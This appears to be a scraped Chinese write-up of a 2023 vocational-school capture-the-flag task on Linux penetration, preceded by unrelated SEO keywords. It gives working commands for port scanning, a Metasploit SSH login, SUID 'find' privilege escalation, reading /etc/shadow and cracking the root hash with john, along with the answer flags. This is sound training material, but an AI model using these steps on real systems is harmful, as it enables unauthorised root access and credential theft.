济南外贸网站建设,wordpress的论坛主题,汽车网站模板,wordpress 中文语言包2023年中职网络安全—Linux系统渗透提权② Linux操作系统渗透测试任务环境说明#xff1a;1. 使用渗透机对服务器信息收集#xff0c;并将服务器中SSH服务端口号作为flag提交#xff1b;2. 使用渗透机对服务器信息收集#xff0c;并将服务器中主机名称作为flag… 2023年中职网络安全—Linux系统渗透提权② Linux操作系统渗透测试任务环境说明1. 使用渗透机对服务器信息收集并将服务器中SSH服务端口号作为flag提交2. 使用渗透机对服务器信息收集并将服务器中主机名称作为flag提交3. 使用渗透机对服务器信息收集并将服务器中系统内核版本作为flag提交4. 使用渗透机对服务器管理员提权并将服务器中root目录下的文本内容作为flag提交5. 使用渗透机对服务器管理员提权并将服务器中root的密码作为flag提交 Linux操作系统渗透测试 任务环境说明 服务器场景Server2203关闭链接用户名hacker 密码123456 1. 使用渗透机对服务器信息收集并将服务器中SSH服务端口号作为flag提交 nmap -p- -sV 靶机IP # -p- 全端口-sV 版本探测flag: 2232/tcp 2. 使用渗透机对服务器信息收集并将服务器中主机名称作为flag提交 ssh hacker靶机IP -p 2232 # -p 指定端口这里有点小坑应该kali的ssh版本高靶机的ssh版本低导致的。# 解法 1 ssh hacker靶机IP -p 2232 -oKexAlgorithmsdiffie-hellman-group1-sha1 # -oKexAlgorithmsdiffie-hellman-group1-sha1 加上这个算你可以点击下面的链接legacy.html # 解法 2 msfconsole # 我只说你可能不懂得 search ssh_login use 0 set RHOSTS 靶机IP set username hacker set password 123456 set RPORT 2232 # 注意一定要改端口别忘记了 run sessions -l # 列出会话 sessions 1 # 连接第一个会话uname -a # 查看系统基本信息flag: 1doLfH31 3. 使用渗透机对服务器信息收集并将服务器中系统内核版本作为flag提交 uname -a # 查看系统基本信息flag: 2.6.18-8.el5 4. 使用渗透机对服务器管理员提权并将服务器中root目录下的文本内容作为flag提交 find / -perm -us -type f 2/dev/nulltouch 1 # 创建个文件 ls # ls 查看文件 /usr/bin/find 1 -exec id \; # 提权 -exec 执行命令 \; 结束/usr/bin/find 1 -exec ls /root \; /usr/bin/find 1 -exec cat /root/key.txt \;flag: 84pPxbiP 5. 使用渗透机对服务器管理员提权并将服务器中root的密码作为flag提交 /usr/bin/find 1 -exec cat /etc/shadow \;vim hash # 把root信息行写入进去 cat hash # 查看是否写入成功 john hash # 破解密码flag: darkman 使用渗透机对服务器管理员提权并将服务器中root目录下的图片内容作为flag提交。 su root # 切换root用户 id # 查看id是否为root cd # 不加参数会直接回到当前用户的家目录 pwd # 查看当前所在目录路径 python -V # 查看当前python版本 python -m SimpleHTTPServer 8080 # 开启HTTP服务端口8080访问的时候一定要指定8080端口flag: HVcKG7tf